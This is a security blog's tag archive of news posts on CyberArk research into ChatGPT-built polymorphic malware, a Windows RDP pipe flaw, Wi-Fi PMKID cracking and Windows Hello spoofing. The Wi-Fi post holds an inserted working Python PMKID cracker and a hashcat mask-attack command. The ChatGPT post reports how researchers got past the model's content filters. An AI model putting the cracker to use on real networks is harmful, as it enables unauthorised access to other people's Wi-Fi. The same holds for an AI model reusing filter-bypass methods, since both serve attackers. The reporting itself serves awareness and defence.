CyberArk Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/cyberark/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.

Russian Cybercriminals Seek Access to OpenAI ChatGPT
https://gridinsoft.com/blogs/access-to-openai-chatgpt/
Thu, 19 Jan 2023 11:03:48 +0000

Check Point analysts have noticed that Russian-speaking hacker forums are actively discussing ways to bypass the geo-blocking that makes OpenAI's ChatGPT language model unavailable in Russia.

We also wrote that Microsoft’s VALL-E AI Is Able to Imitate a Human Voice in a Three-Second Pattern, and also that Google Is Trying to Get Rid of the Engineer Who Suggested that AI Gained Consciousness.

It was also reported that UN calls for a moratorium on the use of AI that threatens human rights.

Let me remind you that the use of ChatGPT to create malware is already under close study by the information security community, and experiments by specialists show that such use of the tool is feasible.

For example, a recent CyberArk report details how to create polymorphic malware using ChatGPT, and the researchers plan to publish part of their work soon "for educational purposes."

[Figure: scheme of the interaction between ChatGPT and the malware]

In fact, CyberArk managed to bypass ChatGPT content filters and demonstrated how “with very little effort and investment on the part of an attacker, you can continuously query ChatGPT, each time receiving a unique, functional and verified piece of code.”

[Figure: basic DLL injection into explorer.exe, with the generated code not yet complete]

"This results in polymorphic malware that does not exhibit malicious behavior when stored on disk, as it receives code from ChatGPT and then executes it without leaving a trace in memory. In addition, we always have the opportunity to ask ChatGPT to change the code," the experts said.

In turn, Check Point researchers warn of rapidly growing interest in ChatGPT among hackers, since it can help them scale malicious activity. This time it turned out that Russian-speaking attackers are trying to get around the restrictions on access to the OpenAI API. Hacking forums already share tips on bypassing IP blocking and working around the bank-card and phone-number verification, that is, everything needed to register for ChatGPT.

"We believe that these hackers are most likely trying to implement and test ChatGPT in their daily criminal operations. Attackers are becoming more and more interested in ChatGPT because the artificial intelligence technology behind it can make a hacker more cost-effective," the specialists write.

To support this, the researchers provide several screenshots. In one of them, a criminal wants access to the OpenAI API and asks his "colleagues" for advice on how best to use a stolen bank card to verify an OpenAI account.


Other screenshots discuss geo-blocking bypass, as ChatGPT is not currently available in Russia, China, Afghanistan, Belarus, Venezuela, Iran, and Ukraine.

OpenAI has restricted access to its products in Ukraine so as not to violate international sanctions imposed after Russia's seizure of Crimea and parts of the Donetsk and Luhansk regions (ORDLO) in 2014.

Forbes reported this, citing a letter the company sent to Ukraine's Ministry of Digital Transformation.

"Because of the sanctions, they have to block ORDLO/Crimea. They do not know how to distinguish them from clients from the rest of Ukraine. If there was a cheap classifier, we would have revised the policy," said Oleksandr Bornyakov, Deputy Minister of Digital Transformation of Ukraine.


The report also notes that many semi-legal online SMS services have already published guides on using their virtual numbers to register for ChatGPT.


Microsoft Has Already Patched a Vulnerability in Windows RDP Twice
https://gridinsoft.com/blogs/vulnerability-in-windows-rdp/
Tue, 21 Jun 2022 13:08:25 +0000

This week, CyberArk researchers shared technical details of a named-pipe vulnerability in Windows Remote Desktop Services (RDP), for which Microsoft had to release two patches.

The RCE vulnerability CVE-2022-21893 was patched in the January 2022 Patch Tuesday release, but that patch did not close the underlying attack vector. In April 2022 Microsoft fixed the follow-up bug, CVE-2022-24533.

Let me remind you that we wrote that Sarwent malware opens RDP ports on infected machines, and also that Information Security Specialists Discovered a 0-day Vulnerability in Windows Search.

CVE-2022-21893 is a Windows Remote Desktop Services (RDS) vulnerability that could allow an unprivileged user via RDP to access the file system of connected users’ devices.

"The original issue was caused by improper handling of named pipe permissions in Remote Desktop Services, which allowed non-admin users to take over RDP virtual channels in other connected sessions. The named pipe was created in such a way that it allowed every user on the system to create additional named pipe server instances with the same name," the researchers write.

The vulnerability allows an attacker to view and modify the contents of the clipboard, sent files, and smart card PINs. An attacker can impersonate a logged in user and gain access to the victim’s connected devices (USB devices, hard drives, etc.).

"This can lead to sensitive data leakage, lateral movement and privilege escalation," CyberArk noted.

According to the researchers, the vulnerability exists due to improper handling of RDS named pipe permissions, which allows a user with normal privileges to “hijack RDP virtual channels in other connected sessions.”

"A named pipe allowed each user on the system to create additional pipe servers with the same name," CyberArk explained.

Microsoft's January fix changed the permissions on the pipes so that a regular user could no longer create additional server instances. However, whoever creates the first instance of a named pipe still controls the security descriptor that later instances of that name inherit, so a user who could predict the pipe name and create it first kept that ability. The April fix generates a new Globally Unique Identifier (GUID) for each channel's pipe name, which stops an attacker from predicting the name of the next pipe. The general defence for any pipe server is the same: create the first instance with FILE_FLAG_FIRST_PIPE_INSTANCE and an explicit DACL, so that creation fails loudly if a squatter's pipe of the same name already exists.

With both patches applied, the researchers consider the issue closed; the recommended action is to install the latest Windows updates so that the April 2022 fix is in place.

Expert hacked 70% of Wi-Fi networks in Tel Aviv for research
https://gridinsoft.com/blogs/expert-hacked-wi-fi-networks-in-tel-aviv/
Wed, 27 Oct 2021 16:08:43 +0000

CyberArk specialist Ido Hoorvitch cracked about 70% of the Wi-Fi networks he sampled in his native Tel Aviv, seeking to show that home networks are poorly secured and easily compromised.

To conduct the experiment, Hoorvitch walked around the city with sniffing equipment and collected 5,000 network hashes. He relied on the fact that many routers include a PMKID, a value intended for fast roaming, in the first EAPOL frame they send, so it can be captured without any client connecting. The PMKID is derived from the passphrase and SSID (stretched into the PMK with PBKDF2) together with the access point and client MAC addresses and the fixed label string "PMK Name".


To capture the PMKID hashes he used an ALFA AWUS036ACH NIC (about $50), which supports both monitor mode and packet injection, and analysed the captures with Wireshark on Ubuntu.


Using the method of Jens "atom" Steube (lead developer of Hashcat), Hoorvitch collected PMKIDs, which were then cracked to obtain passwords.

"The atom method is not client-driven, so there is no need to capture a user's login in real time, nor is there a need to [wait] for users to connect to the network in general. Moreover, an attacker only needs to grab one frame and eliminate incorrect passwords and corrupted frames that interfere with the cracking process," Hoorvitch says.

Hoorvitch started with mask attacks to find people who use their mobile phone number as the Wi-Fi password (a common habit in Israel). Israeli mobile numbers are ten digits and always start with 05, so only eight digits are unknown: the whole keyspace is 10^8 candidates, small enough to exhaust.

Using an ordinary laptop and this technique, the researcher cracked 2,200 passwords at an average rate of nine minutes per password. He then switched to a dictionary attack using rockyou.txt, which quickly cracked a further 1,359 passwords, most of them consisting only of lowercase letters.
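The PMKID construction and the two-stage cracking approach described above, as an added worked example in Python (this is not code from the post or from CyberArk's research). It derives a PMKID from a constructed SSID, MAC pair and passphrase, formats it as a hashcat mode 22000 line, and recovers the passphrase with a mask attack over a narrowed phone-number mask and then a stand-in wordlist. The SSID, MAC addresses, passphrase and wordlist entries are all invented for the demo, and the mask is narrowed to 100 candidates because the real 05?d?d?d?d?d?d?d?d keyspace is 10^8 PBKDF2 runs.

```python
# Added example (not from the Gridinsoft post or CyberArk's research): WPA2-PSK
# PMKID derivation plus the two offline attacks described above, run on
# constructed sample data so it works without any capture hardware.
import hashlib
import hmac
import itertools

PMK_NAME = b"PMK Name"   # fixed label string in the 802.11 PMKID construction
PBKDF2_ROUNDS = 4096     # WPA2-PSK passphrase-to-PMK iteration count

CHARSETS = {
    "d": "0123456789",
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
}


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the expensive step: one call per candidate password."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ROUNDS, 32)


def pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || MAC_AP || MAC_STA)."""
    return hmac.new(pmk, PMK_NAME + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def to_hc22000(pmkid_bytes: bytes, mac_ap: bytes, mac_sta: bytes, ssid: str) -> str:
    """Format a captured PMKID as a hashcat mode 22000 line (type 01 = PMKID)."""
    return "WPA*01*{}*{}*{}*{}***".format(
        pmkid_bytes.hex(), mac_ap.hex(), mac_sta.hex(), ssid.encode().hex())


def expand_mask(mask: str):
    """Expand a hashcat-style mask (?d ?l ?u; any other character is literal)."""
    slots = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask) and mask[i + 1] in CHARSETS:
            slots.append(CHARSETS[mask[i + 1]])
            i += 2
        else:
            slots.append(mask[i])
            i += 1
    for combo in itertools.product(*slots):
        yield "".join(combo)


def crack_pmkid(target: bytes, ssid: str, mac_ap: bytes, mac_sta: bytes, candidates):
    """Return the first candidate whose PMKID matches the capture, else None."""
    for cand in candidates:
        if not 8 <= len(cand) <= 63:          # WPA2-PSK passphrase length limits
            continue
        if hmac.compare_digest(pmkid(derive_pmk(cand, ssid), mac_ap, mac_sta), target):
            return cand
    return None


# Constructed sample capture (hypothetical SSID, MACs and passphrase): an AP whose
# owner used an Israeli-style mobile number, 05 + eight digits, as the PSK.
SAMPLE_SSID = "Example-Home"
SAMPLE_MAC_AP = bytes.fromhex("a1b2c3d4e5f6")
SAMPLE_MAC_STA = bytes.fromhex("0a1b2c3d4e5f")
SAMPLE_PSK = "0523456789"
SAMPLE_PMKID = pmkid(derive_pmk(SAMPLE_PSK, SAMPLE_SSID), SAMPLE_MAC_AP, SAMPLE_MAC_STA)


def run_demo():
    """Stage 1: phone-number mask; stage 2: wordlist. Returns both results."""
    # The real mask is 05?d?d?d?d?d?d?d?d (10^8 PBKDF2 runs). The demo fixes the
    # first eight digits so the search stays at 100 candidates.
    by_mask = crack_pmkid(SAMPLE_PMKID, SAMPLE_SSID, SAMPLE_MAC_AP, SAMPLE_MAC_STA,
                          expand_mask("05234567?d?d"))
    # A tiny constructed stand-in for rockyou.txt; the PSK is not in it, so this
    # stage returns None, as the wordlist stage would for a phone-number PSK.
    by_wordlist = crack_pmkid(SAMPLE_PMKID, SAMPLE_SSID, SAMPLE_MAC_AP, SAMPLE_MAC_STA,
                              ["password", "sunshine1", "iloveyou"])
    return by_mask, by_wordlist


if __name__ == "__main__":
    print(to_hc22000(SAMPLE_PMKID, SAMPLE_MAC_AP, SAMPLE_MAC_STA, SAMPLE_SSID))
    print("mask attack -> %r, wordlist attack -> %r" % run_demo())
```

The printed hc22000 line is what you would hand to hashcat (`-m 22000 -a 3 05?d?d?d?d?d?d?d?d` reproduces the mask stage at GPU speed); the Python cracker is deliberately the same PBKDF2-then-HMAC check, just unoptimised, to make the cost per candidate visible.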


In total, Hoorvitch cracked the passwords of about 70% of the sampled Wi-Fi networks (3,559 of 5,000), confirming his assumptions about how poorly home Wi-Fi is secured.

He concludes that users should disable roaming on routers used in personal (WPA2-Personal) networks, since a home network has no need for it, and notes that passwords longer than 10 letters/digits are markedly more resistant to cracking. Note that disabling roaming only removes the client-less PMKID capture; a captured four-way handshake gives an equivalent offline attack on the same passphrase, so passphrase strength (or a move to WPA3, whose SAE handshake is not exposed to offline dictionary attacks) is the real control.

Let me remind you that any Wi-Fi-enabled device is vulnerable to the FragAttacks issues.

Researchers trick Windows Hello with infrared image
https://gridinsoft.com/blogs/researchers-trick-windows-hello-with-infrared-image/
Mon, 19 Jul 2021 16:34:31 +0000

CyberArk researchers tricked the Windows Hello biometric authentication system that is included in all versions of Windows 10 using an infrared image of the device owner.

Researcher Omer Tsarfati says the root of the problem lies in how Windows Hello handles data from USB-connected webcams. Windows Hello only works with webcams that have an infrared sensor in addition to a regular RGB one, but it turns out the system barely uses the RGB data. This means that a single infrared image of the owner's face is enough to unlock a device protected by Windows Hello biometrics.

Most users know they can use a webcam for face authentication on a Windows 10 machine; Tsarfati found that Windows Hello's face recognition relies on the camera's infrared frames, and that the validation of that infrared input is insufficient, essentially no stricter than the handling of the conventional (RGB) frames it barely uses.

As a result, an attacker can plug a malicious device that presents itself as a USB camera into the computer and use it to stream an infrared image of the owner's face. A static image will not normally pass Windows Hello, but that restriction does not hold for injected infrared input, and the researcher tricked the authentication process into unlocking the machine.

A video demonstration of the attack can be seen here.


"We created a complete map of the entire Windows Hello facial recognition process and saw that the most convenient way for an attacker is to pretend to be a webcam, because the entire system relies on this input," says the expert.

The attack requires physical access to the device in order to attach the spoofed camera. Microsoft fixed the vulnerability, tracked as CVE-2021-34466, in the July 2021 Patch Tuesday release; on supported hardware, Windows Hello Enhanced Sign-in Security, which restricts the sensors the face-recognition pipeline will trust, is the relevant hardening option.

"Actually, Microsoft needs to be careful. We have known this method of attack for a long time. I am a little disappointed that they do not restrict which cameras can be trusted," concludes Tsarfati.

Let me remind you that I wrote that Cybersecurity expert created an exploit to hack iPhone via Wi-Fi and that Researchers made Tesla’s autopilot work without a driver.
